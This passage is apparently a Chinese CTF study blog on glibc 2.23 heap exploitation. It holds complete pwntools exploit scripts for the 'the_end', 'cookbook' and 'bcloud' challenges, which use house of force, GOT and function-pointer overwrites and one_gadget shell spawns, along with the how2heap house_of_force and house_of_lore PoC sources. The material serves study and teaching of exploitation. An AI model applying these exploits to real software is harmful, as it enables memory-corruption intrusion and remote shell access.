p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
global_max_fast=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")

'''libc 2.23 x64
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
req = dest - old_top - 4*sizeof(long)

'''
# todo here
def writeByte(address,Byte):
p.send(p64(address))
sleep(0.1)
p.send(Byte)
sleep(0.1)

p.recvuntil('here is a gift ')
libc_base=int(p.recv(len('0x7f4ec6b9d230')),16)-libc.symbols['sleep']
loginfo('libc_base',libc_base)
'''stdout
stdout_IO_write_ptr=0x3c5648
stdout_vtable_off=0x3c56f8
address_off=0x3c53e0
func_off=0x3c53f8
'''
stdin_IO_write_ptr=0x3c4908
stdin_vtable_off=0x3c49b8
address_off=0x3c53e0
func_off=0x3c53f8

#gdb.attach(p,'brva 0x950')
writeByte(stdin_IO_write_ptr+libc_base,'\xff')
off=address_off+libc_base
off=(off>>8)&0xff
off=chr(off)
writeByte(stdin_vtable_off+libc_base+1,off)
one_off=0xf1147+libc_base
one_off1=chr(one_off&0xff)
one_off2=chr((one_off&0xff00)>>8)
one_off3=chr((one_off&0xff0000)>>16)

writeByte(func_off+libc_base,one_off1)
writeByte(func_off+libc_base+1,one_off2)
writeByte(func_off+libc_base+2,one_off3)

p.interactive()

Exploit2

第二种方法真的是让我感受到了函数指针的伟大23333,简直是Control the ptr ,control the world,这些利用都太奇妙了,再就是源码大法好,以后一定要多看看源码

这里是直接修改的_rtld_global._dl_rtld_lock_recursive这个函数指针….甚至是直接修改地址第三位就可以了…真的tql,被师傅们强大到,以后菜鸡一定多看看源码

直接放exp吧都没什么好写的了23333

完整exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = './the_end' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
global_max_fast=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")

'''libc 2.23 x64
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
req = dest - old_top - 4*sizeof(long)
'''
# todo here
def writeByte(address,Byte):
p.send(p64(address))
sleep(0.1)
p.send(Byte)
sleep(0.1)

p.recvuntil('here is a gift ')
libc_base=int(p.recv(len('0x7f4ec6b9d230')),16)-libc.symbols['sleep']
loginfo('libc_base',libc_base)

ptr_off_set=0x5f0f48
one_gadget=0xf02a4+libc_base
off1=one_gadget&0xff
off2=(one_gadget&0xff00)>>8
off3=(one_gadget&0xff0000)>>16
#gdb.attach(p,'brva 0x950')
writeByte(libc_base+ptr_off_set,chr(off1))
writeByte(libc_base+ptr_off_set,chr(off1))
writeByte(libc_base+ptr_off_set,chr(off1))
writeByte(libc_base+ptr_off_set+1,chr(off2))
writeByte(libc_base+ptr_off_set+2,chr(off3))


p.interactive()

how2heap - house_of_force&cookbook、bcloud

ubuntu16.04 libc2.23

house_of_force.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
/*
This PoC works also with ASLR enabled.
It will overwrite a GOT entry so in order to apply exactly this technique RELRO must be disabled.
If RELRO is enabled you can always try to return a chunk on the stack as proposed in Malloc Des Maleficarum
( http://phrack.org/issues/66/10.html )
Tested in Ubuntu 14.04, 64bit.
*/


#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

char bss_var[] = "This is a string that we want to overwrite.";

int main(int argc , char* argv[])
{
fprintf(stderr, "\nWelcome to the House of Force\n\n");
fprintf(stderr, "The idea of House of Force is to overwrite the top chunk and let the malloc return an arbitrary value.\n");
fprintf(stderr, "The top chunk is a special chunk. Is the last in memory "
"and is the chunk that will be resized when malloc asks for more space from the os.\n");

fprintf(stderr, "\nIn the end, we will use this to overwrite a variable at %p.\n", bss_var);
fprintf(stderr, "Its current value is: %s\n", bss_var);



fprintf(stderr, "\nLet's allocate the first chunk, taking space from the wilderness.\n");
intptr_t *p1 = malloc(256);//0x100
fprintf(stderr, "The chunk of 256 bytes has been allocated at %p.\n", p1 - 2);

fprintf(stderr, "\nNow the heap is composed of two chunks: the one we allocated and the top chunk/wilderness.\n");
int real_size = malloc_usable_size(p1);
fprintf(stderr, "Real size (aligned and all that jazz) of our allocated chunk is %ld.\n", real_size + sizeof(long)*2);

fprintf(stderr, "\nNow let's emulate a vulnerability that can overwrite the header of the Top Chunk\n");

//----- VULNERABILITY ----
intptr_t *ptr_top = (intptr_t *) ((char *)p1 + real_size - sizeof(long));
fprintf(stderr, "\nThe top chunk starts at %p\n", ptr_top);

fprintf(stderr, "\nOverwriting the top chunk size with a big value so we can ensure that the malloc will never call mmap.\n");
fprintf(stderr, "Old size of top chunk %#llx\n", *((unsigned long long int *)((char *)ptr_top + sizeof(long))));
*(intptr_t *)((char *)ptr_top + sizeof(long)) = -1;
fprintf(stderr, "New size of top chunk %#llx\n", *((unsigned long long int *)((char *)ptr_top + sizeof(long))));
//------------------------

fprintf(stderr, "\nThe size of the wilderness is now gigantic. We can allocate anything without malloc() calling mmap.\n"
"Next, we will allocate a chunk that will get us right up against the desired region (with an integer\n"
"overflow) and will then be able to allocate a chunk right over the desired region.\n");

/*
* The evil_size is calulcated as (nb is the number of bytes requested + space for metadata):
* new_top = old_top + nb
* nb = new_top - old_top
* req + 2sizeof(long) = new_top - old_top
* req = new_top - old_top - 2sizeof(long)
* req = dest - 2sizeof(long) - old_top - 2sizeof(long)
* req = dest - old_top - 4*sizeof(long)
*/
unsigned long evil_size = (unsigned long)bss_var - sizeof(long)*4 - (unsigned long)ptr_top;
fprintf(stderr, "\nThe value we want to write to at %p, and the top chunk is at %p, so accounting for the header size,\n"
"we will malloc %#lx bytes.\n", bss_var, ptr_top, evil_size);
void *new_ptr = malloc(evil_size);
fprintf(stderr, "As expected, the new pointer is at the same place as the old top chunk: %p\n", new_ptr - sizeof(long)*2);

void* ctr_chunk = malloc(100);
fprintf(stderr, "\nNow, the next chunk we overwrite will point at our target buffer.\n");
fprintf(stderr, "malloc(100) => %p!\n", ctr_chunk);
fprintf(stderr, "Now, we can finally overwrite that value:\n");

fprintf(stderr, "... old string: %s\n", bss_var);
fprintf(stderr, "... doing strcpy overwrite with \"YEAH!!!\"...\n");
strcpy(ctr_chunk, "YEAH!!!");
fprintf(stderr, "... new string: %s\n", bss_var);


// some further discussion:
//fprintf(stderr, "This controlled malloc will be called with a size parameter of evil_size = malloc_got_address - 8 - p2_guessed\n\n");
//fprintf(stderr, "This because the main_arena->top pointer is setted to current av->top + malloc_size "
// "and we \nwant to set this result to the address of malloc_got_address-8\n\n");
//fprintf(stderr, "In order to do this we have malloc_got_address-8 = p2_guessed + evil_size\n\n");
//fprintf(stderr, "The av->top after this big malloc will be setted in this way to malloc_got_address-8\n\n");
//fprintf(stderr, "After that a new call to malloc will return av->top+8 ( +8 bytes for the header ),"
// "\nand basically return a chunk at (malloc_got_address-8)+8 = malloc_got_address\n\n");

//fprintf(stderr, "The large chunk with evil_size has been allocated here 0x%08x\n",p2);
//fprintf(stderr, "The main_arena value av->top has been setted to malloc_got_address-8=0x%08x\n",malloc_got_address);

//fprintf(stderr, "This last malloc will be served from the remainder code and will return the av->top+8 injected before\n");
}

这里面最重要的应该就是这个计算过程了,我把步骤解释写一下:

1
2
3
4
5
6
7
8
9
#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
new_top = old_top + nb
//remainder = ↑chunk_at_offset (victim, nb);源码中这里remainder对应的就是new_top,victim此时就是old_top

nb = new_top - old_top
req + 2sizeof(long) = new_top - old_top//这里分解nb
req = new_top - old_top - 2sizeof(long)
req = dest - 2sizeof(long) - old_top - 2sizeof(long)//dest = new_top + 2sizeof(long)
req = dest - old_top - 4*sizeof(long)

其中最主要的是通过chunk_at_offset(p, s)这个Macro来获得victim的时候,nb为负数时会把topchunk的位置往回放

但是_int_malloc最开始对我们申请的bytes做的检查是这样的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#define REQUEST_OUT_OF_RANGE(req)                                 \
((unsigned long) (req) >= \
(unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
//MINSIZE:x64 0x20,x86 0x10
//-2*MINSIZE=0xFFFF FFFF FFFF FFC0(x64),0xFFFF FFE0(x86)
//req会被转换成unsigned long,只要我们通过上面的这个检查就可以过第一步了
/* pad request bytes into a usable size -- internal version */

#define request2size(req) \
(((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE) ? \
MINSIZE : \
((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)

/* Same, except also perform argument check */

#define checked_request2size(req, sz) \
if (REQUEST_OUT_OF_RANGE (req)) { \
__set_errno (ENOMEM); \
return 0; \
} \
(sz) = request2size (req);

然后用一个负数的nb去topchunk申请chunk,当然其中经过smallbin range检查的时候还调用了malloc_consolidate

用topchunk的size和nb作比对的时候都是转换成了unsigned long:此时-1计算出来的size是最大的,可以通过该检查:(unsigned long) (size) >= (unsigned long) (nb + MINSIZE)

Debug

先不急着debug示例程序,我自己准备用自己的程序试一试,具体如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#include <stdio.h>
#include <stdlib.h>
int main(int argc , char* argv[])
{
char *fast=malloc(0x20);
char *p=malloc(0xff0);
free(fast);//use for test
*(int64_t *)(p+0xff8)=(long long)-1;//set top_chunk size

char *p2=malloc(0xFFFFFFFFFFFFF000-2*sizeof(size_t));//set new_top
char *p3=malloc(0x100);//the same address as p
printf("%p,%p",p,p3);
return 0;
}

这里我写了一个简单的程序,其中0x30的chunk是用来debug的时候看是否调用了malloc_consolidate

设置top_chunk size之后:

可以看到pwndbg的脚本报错了,不过我们直接看地址偏移还是一样的

然后char *p2=malloc(0xFFFFFFFFFFFFF000-2*sizeof(size_t));这一行的意思是传入一个-0x1000-2*size_t的值,计算nb时会补成-0x1000,通过两道检查后在源码中这里:remainder = chunk_at_offset (victim, nb),remainder是用来设置新的top_chunk的,所以我们直接就把top_chunk往回放到我们之前申请的0x1000的chunk处去了。

因为chunksize计算时会除去低三位,所以remainder_size = size - nb;这一步中的size实际上是0xfffffffffffffff8
,减去nb(-0x1000)之后就变成了0xff8,如果我们想要之后的top_chunk能再大一些显然做不到了,因为要通过(unsigned long) (size) >= (unsigned long) (nb + MINSIZE)这个检查

再就是设置top_chunk size的时候,虽然说计算size时低三位是没用的,但是最后一位必须为1,要不然在_libc_malloc里面的arena_get好像会出问题(待深入)

以上内容执行时如下:

可以看到新的top_chunk已经被设置成了我们之前0x1000 chunk的地址

最后的运行效果就是这样:

1582043111462

两个指针指向的chunk是一样的,也验证了req = dest - old_top - 4*sizeof(long)


然后再来debug示例代码(这里很简略)

所以上面示例代码中把topchunk的size改成了-1,然后计算出的evil_size=0xffffffffffafcf30当然也通过了检查

可以看到这里算出来的remainder就是0x602050了,刚好是我们字符串地址-0x10的位置,所以再malloc的时候就可以malloc出这块内存,至于后面注释的那一部分,大致意思就差不多是我们可以通过这个方法来修改GOT表,暂时就不debug了

当然这上面是因为没有开ASLR,bss和top_chunk比较近,如果开启PIE加上ASLR的效果也是一样的:

一样申请到了这块内存

接下来肝题吧

cookbook

程序分析

emmm…怎么说呢,感觉以后分析这种程序得换换思路了,以前都是拿着题就往IDA拖了分析,现在看来程序复杂度够高的时候直接这样分析好像不太行,工作量太大,而且根本没有思路,对于量大一点的题得先跑熟悉有个印象再去写,熟悉逻辑之后再去逆会快很多

下面就写一些大致的,后面会放一个总结的图,说不定以后程序分析就都是总结的图了,因为程序每个细节都扣到会浪费时间,能找到漏洞然后利用才是王道啊

main

1582247560625

main大致对应的就是这些东西,Rec代表recipe,Ing代表Ingredient,main_menu是我们操作主菜单,之前做的都是初始化操作

init_RecAndIng

这个函数分为两个子函数,第一个差不多是下面这样子的,主要做初始化Ingredient的操作

add_ingredientcalloc(0x90)一个ingredient的结构体,等下放一张图给自己看吧

Ingredient_ListHeader是存在.bss段上的一个链表头指针。LinkList_add就是往这个头指针添加结点,calloc(0x8),然后存一个next指针一个数据

第二个子函数就是初始化三个recipe(0x40C),当时直接拿着程序看的时候在这浪费了很多时间,因为根本不知道要干什么,以后碰到这种就先跑一下程序熟悉熟悉,看这些字符串出现在什么地方再逆,ret_Ingredient_ptr是根据name返回对应Ingredient结构体的指针Dish type应该不用管

不过这两个初始化函数用来逆结构体还是挺好的,这里把结构体放出来吧

struct

再来看main_menu

就是我们正常的菜单选择了,这里就不做细致分析了,没必要,我下面的这张图记录了每个函数大致的操作

All in one

1582249392325

所有对应的选项我都记录了大致对应的操作,当然也不乏在调试中发现的一些小细节,比如creat recipe里面是删不掉Ingredient的,因为fegts结尾的\n程序没有处理,导致strcmp比对失败…

最后程序通过链表和不同结构体的管理如下图所示,我这里只拿了一个Ingredient和Recipe做示例

1582213398090

漏洞分析&Exploite

leak

这个题的leak其实只要有经验的话应该马上就能想到,没有经验的话像我可能还稍微想了一段时间吧,当然也要注意这里面的chunk很多都是calloc出来的。当时我在想leak构造的时候第一反应是 creat recipe里面free时没有对current_pt赋值0,所以存在一个bad save,然后就可以打印出对应的东西,这里只有一个recipe chunk被free的时候就可以打印出来这个unsortedbin chunk上的*(*bk)处的值,这里是top_chunk的地址。

后来我想通过remove ingredient来给ingredient chunk的fd和bk处放上libc地址结果失败了,因为我发现这里根本删不了..坑,还以为是出了什么问题,不过依旧是这个思路,由于我们current_ptr是保存在.bss上的,所以我们可以,出去删了这个ingredient之后再回到这里leak,这样在打印price的时候就会leaklibc了,注意数量一定要设置1

Arbitrary write

本题还有一个0x8C的大overflow我们没有用到,最开始我想的是能不能通过fastbin来attack一个地方,后来发现没什么思路就放弃了,因为house_of_force的方法在这里更明显一些,我们可以直接通过这个大overflow来修改top_chunk然后改写GOT表,最后调用system("/bin/sh")。当然改GOT表的过程特别玄学,由于只有Ingredient和cookbook name是malloc出来的,而bookname在我这个方法里面要在设置top_size之后用来设置new top的位置,所以我这里不能用bookname来更改GOT表,只能用Ingredient,但是调试过程中确实踩了很多坑,最后对应ingredient的位置很苛刻

从前往后试这两个地方用来在设置topchunk的时候写size,前面的内存是不可写的(这里写一笔给记性差的自己:因为32位chunk要8bit对齐,所以只有结尾是4和C的地方才写size),而后malloc ingredient时因为输入Ingredient->name的时候程序会calloc一块chunk出来,也就意味着0x98Bytes后的数据全部会被清零,所以很多数据都会受到连锁影响(跪。而且我试0x0804D004这个地方的时候发现,后面的malloc居然刚好把currentIng_ptr给设置成size字段了,以后在这些数据段操作之前一定先看看后面的一些特殊偏移有什么数据(….&currentIng_ptr-0x0804D000=0x9C(malloc_usable_size))出题人应该是估计苛刻的?
然后用0x0804D00C这个地方用来写size,最后使用哪个表作为system我用的是atoi(好像用free更方便一点)。然后输入name的时候由于fgets会损坏一个Byte的数据,所以我干脆把一些表项全填上去了,当我把要利用的函数的偏移一个个的填上去之后发现,利用的时候由于memcpy是cpy0x80个字节的数据,刚好把bss上的stdin和stdout给写没了,所以又去把stdin和stdout的地址写了上去才成功

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *
import numpy

binary = 'cookbook' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
ub_offset = 0x3c4b30
codebase = 0x555555554000
#log.info("\033[1;36m" +''+hex() + "\033[0m")

# todo here
def main_choice(cha):
p.recvuntil('[q]uit\n')
p.sendline(cha)

def Ing_choice(cha):
p.recvuntil('quit)?\n')
p.sendline(cha)

def recipe_choice(cha):
p.recvuntil('[q]uit\n')
p.sendline(cha)

def creat_for_leak():
main_choice('a')
Ing_choice('n')
Ing_choice('g')
sleep(0.1)
p.sendline('********')
Ing_choice('e')
Ing_choice('q')

def creat_for_fill():
main_choice('a')
Ing_choice('n')
Ing_choice('g')
sleep(0.1)
p.sendline('********')
Ing_choice('e')
Ing_choice('q')

def leak_heap():
main_choice('c')
recipe_choice('n')
recipe_choice('a')
p.recvuntil('to add? ')
p.sendline('********')
p.recvuntil('many? (hex): ')
p.sendline('0x1')
recipe_choice('d')
recipe_choice('p')
p.recvuntil('\n')
p.recvuntil('\n')
p.recvuntil('\n')
heap_base=int(p.recvuntil(' -').strip(' -'))-0x1780
recipe_choice('q')
return heap_base

def leak_libc():
main_choice('c')
recipe_choice('n')
recipe_choice('a')
p.recvuntil('to add? ')
p.sendline('********')
p.recvuntil('many? (hex): ')
p.sendline('0x1')
recipe_choice('q')
main_choice('e')
p.recvuntil('exterminate? ')
p.sendline('********')
main_choice('c')
recipe_choice('p')
p.recvuntil('$')
libc_base=int(p.recvuntil('\n').strip('\n'))-0x1b27b0
recipe_choice('q')
return libc_base

def set_topsize():
main_choice('c')
recipe_choice('g')
sleep(0.1)
p.sendline('a'*0x3c0+p32(0xffffffff))
recipe_choice('q')

p.recvuntil('your name?\n')
p.sendline('ljc')

creat_for_leak()
heap_base=leak_heap()
log.info("\033[1;36m" +'heap_base:'+hex(heap_base) + "\033[0m")
libc_base=leak_libc()
log.info("\033[1;36m" +'libc_base:'+hex(libc_base) + "\033[0m")

creat_for_fill()
set_topsize()

#new_top->0x0804D000
#req = dest - old_top - 4*sizeof(long)
req =numpy.array([0x0804D010,],dtype=numpy.uint32)
main_choice('g')
p.recvuntil('hacker!) : ')
req[0]=req[0]-(heap_base+0x17a0)-4*4
log.info(hex(req[0]))
p.sendline(hex(req[0]))

#gdb.attach(p,'b *0x08048D40')
main_choice('a')
Ing_choice('n')
free =0x1ec180
memcpy=0x77610
fgets =0x5e150
alarm =0xb0270
stk =0
malloc=0x1ec110
puts =0x5fca0
g=0
strtoul=0
start=0
buf=0
system=0x3ada0
calloc=0x1ec130
Ing_choice('g')
name=p32(free+libc_base)+p32(memcpy+libc_base)+p32(fgets+libc_base)+p32(alarm+libc_base)+p32(stk)+p32(malloc+libc_base)+p32(puts+libc_base)+p32(g)+p32(strtoul)
name+=p32(start)+p32(buf)+p32(system+libc_base)+p32(calloc+libc_base)
name=name.ljust(0x68,'\x00')
name+=p32(0x1b25a0+libc_base)
name+=p32(0x1b2d60+libc_base)
p.sendline(name)
Ing_choice('s')
p.sendline('/bin/sh')

p.interactive()

bcloud

程序分析

注:这个程序分析是在我写完题之后再来写的,可能会有很多东西会有剧透的既视感…主要是用来帮助自己以后看的

main就是很正常的菜单,就不多废话了,直接从其中做初始化的函数开始看

初始化函数

0x0804899C:这个函数包括了两个函数,其中分别对应两个输入点

姑且称第一个是input_name,第二个是input_org_host

input_name

这里有一个比较坑的点我刚开始一直都没发现(当然还是自己太菜了),因为这个readn_add0(ptr,n,chr)是一个最多读取n个字符然后会在结尾处+0的函数,如果read过程中碰到chr就直接+0退出结束,也就是说如果我们输入了0x40个字符,他就会在0x41处补0。在这里,我们输入0x40之后他会把0补在V2这个变量处,随之被malloc的指针覆盖了,由于32位程序中指针都占4字节,所以覆盖之后这里直接连着堆指针一起strcpy进了chunk中,没有\x00截断。然后调用info输出了chunk中的内容

input_org_host

上面的trick在这里同样出现了一遍,当然这里主要是org v2 host这三个连在了一起,最后在strcpy的时候是一个比较大的溢出,由于v2对应的chunk紧跟的就是top_chunk,所以很自然能联想到house_of_force

new

根据下标和记录存放malloc的ptr,lenth由我们输入然后会被存到len_Array中,接着根据lenth读入conent,由于malloc时lenth+4,所以构成不了overflow

edit

没什么好说的了,就是根据存的len来读数据

delete

1582413728779

先把ptr存在栈上,清空记录然后free(ptr)

其他的函数都好像没什么用就不用管了

Exploit

主要就是第二个初始化input_org_host中产生的house_of_force,先将top_chunk.size根据溢出赋值成0xffffffff,然后malloc一个负数设置top_chunk,之后再利用edit就好了,主要就是得发现house_of_force这个洞23333

接着就是在我们的ptr_Array上玩了,我设置的dest稍微在array上面一点,主要是当时免得出错,反正edit的时候可以打pad,当我们用设置好top之后,id0被占用,再新malloc出来用来写Array的chunk会放在index1,当然这个chunk我只写了一次,只用把对应的东西布置好就行了,具体布置什么见以下

由于我们最终的目的是要getshell,仅仅只有一个heap_base肯定是不行的,我们还需要leak一个libc的地址,这里我稍微想了一会,至于libc地址现在可以存在于三个地方:stack、got或者非fastbin链中的chunk。我最开始想的是:通过再malloc一个大一点的chunk之后free,然后在array上就有libc地址了,通过写一个array上的记录指向这个地址就可以打印,但是怎么打印呢,一般打印的方法有通过程序中有输出点的地方打印,或者通过栈溢出控制函数参数、返回地址到puts_plt这样打印,可是这个程序既没有打印chunk的函数…..也无法栈溢出或者泄露栈地址什么的,但是我想到能够设置一个GOT表然后调用edit修改,我们手上暂时又只有程序的地址可以用,所以我就找了一下有什么函数可以用来接受一个地址然后输出的(因为我们程序中使用Array中的数据而且调用到库函数的只有free),刚好有一个函数0x08048779,是接受一个地址然后打%s,这大概就是出题人故意设置的吧2333。所以把free的GOT改成这个函数就可以了,free的GOT表项后面是__stack_chk_fail,不会影响什么

不过我最开始的那个思路free一个大一点的chunk失败了,所以就转而想到了更简单的方法,利用GOT表

然后我们的Array上现在只需要有一样东西就行:GOT表地址。一个用来改free的GOT,一个用来leak

leak之后再把free的GOT改成system,然后malloc一个/bin/sh\x00的chunk,然后free就好了

好像也可以改atoi的GOT更方便一些(或者当修改GOT表影响了相邻表项会出错时可以试试)不过这里就不做多余的事了,getshell就行

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = 'bcloud' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
ub_offset = 0x3c4b30
codebase = 0x555555554000
def loginfo(what='',address=0):
log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")
# todo here

def new(len,content):
p.recvuntil('option--->>\n')
p.sendline('1')
p.recvuntil('the note content:\n')
p.sendline(str(len))
p.recvuntil('the content:\n')
p.send(content)
def edit(id,content):
p.recvuntil('option--->>\n')
p.sendline('3')
p.recvuntil('the id:\n')
p.sendline(str(id))
p.recvuntil('new content:\n')
loginfo('',0)
p.send(content)
def delete(id):
p.recvuntil('option--->>\n')
p.sendline('4')
p.recvuntil('the id:')
p.sendline(str(id))
p.recvuntil('your name:\n')
p.send('a'*0x40)
p.recvuntil('a'*0x40)
heap_base=my_u32(p.recv(4))-0x8
loginfo('heap_base',heap_base)


p.recvuntil('Org:\n')
p.send('a'*0x40)
p.recvuntil('Host:\n')
p.sendline('\xff'*4)

dest=0x0804B110
old_top=heap_base+0xd8
corrupt_size=dest-old_top-4*4-4
#req = dest - old_top - 4*sizeof(long
leakfunction=0x08048779
free_got=0x0804B014


gdb.attach(p,'b *0x08048b4f')
new(corrupt_size,'\n')#set top
new(0x18,'a'*0x10+p32(0x0804B03C)+p32(free_got)+'\n')#id 0 1 atoi_got

edit(1,p32(leakfunction)+'\n')
delete(0)

p.recvuntil('Hey ')
libc_base=my_u32(p.recv(4))-0x2d250
loginfo('libc base',libc_base)
system=0x3ada0+libc_base
edit(1,p32(system)+'\n')
new(0x8,'/bin/sh\x00\n')
delete(0)
p.interactive()

how2heap - house_of_lore&overlapping_chunks_2

ubuntu16.04 libc2.23

这两个没有例题所以我放在一起了

house_of_lore.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
/*
Advanced exploitation of the House of Lore - Malloc Maleficarum.
This PoC take care also of the glibc hardening of smallbin corruption.
[ ... ]
else
{
bck = victim->bk;
if (__glibc_unlikely (bck->fd != victim)){
errstr = "malloc(): smallbin double linked list corrupted";
goto errout;
}
set_inuse_bit_at_offset (victim, nb);
bin->bk = bck;
bck->fd = bin;
[ ... ]
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

void jackpot(){ puts("Nice jump d00d"); exit(0); }

int main(int argc, char * argv[]){


intptr_t* stack_buffer_1[4] = {0};
intptr_t* stack_buffer_2[3] = {0};

fprintf(stderr, "\nWelcome to the House of Lore\n");
fprintf(stderr, "This is a revisited version that bypass also the hardening check introduced by glibc malloc\n");
fprintf(stderr, "This is tested against Ubuntu 14.04.4 - 32bit - glibc-2.23\n\n");
fprintf(stderr, "This technique only works with disabled tcache-option for glibc, see build_glibc.sh for build instructions.\n");

fprintf(stderr, "Allocating the victim chunk\n");
intptr_t *victim = malloc(100);
fprintf(stderr, "Allocated the first small chunk on the heap at %p\n", victim);

// victim-WORD_SIZE because we need to remove the header size in order to have the absolute address of the chunk
intptr_t *victim_chunk = victim-2;

fprintf(stderr, "stack_buffer_1 at %p\n", (void*)stack_buffer_1);
fprintf(stderr, "stack_buffer_2 at %p\n", (void*)stack_buffer_2);

fprintf(stderr, "Create a fake chunk on the stack\n");
fprintf(stderr, "Set the fwd pointer to the victim_chunk in order to bypass the check of small bin corrupted"
"in second to the last malloc, which putting stack address on smallbin list\n");
stack_buffer_1[0] = 0;
stack_buffer_1[1] = 0;
stack_buffer_1[2] = victim_chunk;

fprintf(stderr, "Set the bk pointer to stack_buffer_2 and set the fwd pointer of stack_buffer_2 to point to stack_buffer_1 "
"in order to bypass the check of small bin corrupted in last malloc, which returning pointer to the fake "
"chunk on stack");
stack_buffer_1[3] = (intptr_t*)stack_buffer_2;
stack_buffer_2[2] = (intptr_t*)stack_buffer_1;

fprintf(stderr, "Allocating another large chunk in order to avoid consolidating the top chunk with"
"the small one during the free()\n");
void *p5 = malloc(1000);
fprintf(stderr, "Allocated the large chunk on the heap at %p\n", p5);


fprintf(stderr, "Freeing the chunk %p, it will be inserted in the unsorted bin\n", victim);
free((void*)victim);

fprintf(stderr, "\nIn the unsorted bin the victim's fwd and bk pointers are nil\n");
fprintf(stderr, "victim->fwd: %p\n", (void *)victim[0]);
fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);

fprintf(stderr, "Now performing a malloc that can't be handled by the UnsortedBin, nor the small bin\n");
fprintf(stderr, "This means that the chunk %p will be inserted in front of the SmallBin\n", victim);

void *p2 = malloc(1200);
fprintf(stderr, "The chunk that can't be handled by the unsorted bin, nor the SmallBin has been allocated to %p\n", p2);

fprintf(stderr, "The victim chunk has been sorted and its fwd and bk pointers updated\n");
fprintf(stderr, "victim->fwd: %p\n", (void *)victim[0]);
fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);

//------------VULNERABILITY-----------

fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");

victim[1] = (intptr_t)stack_buffer_1; // victim->bk is pointing to stack

//------------------------------------

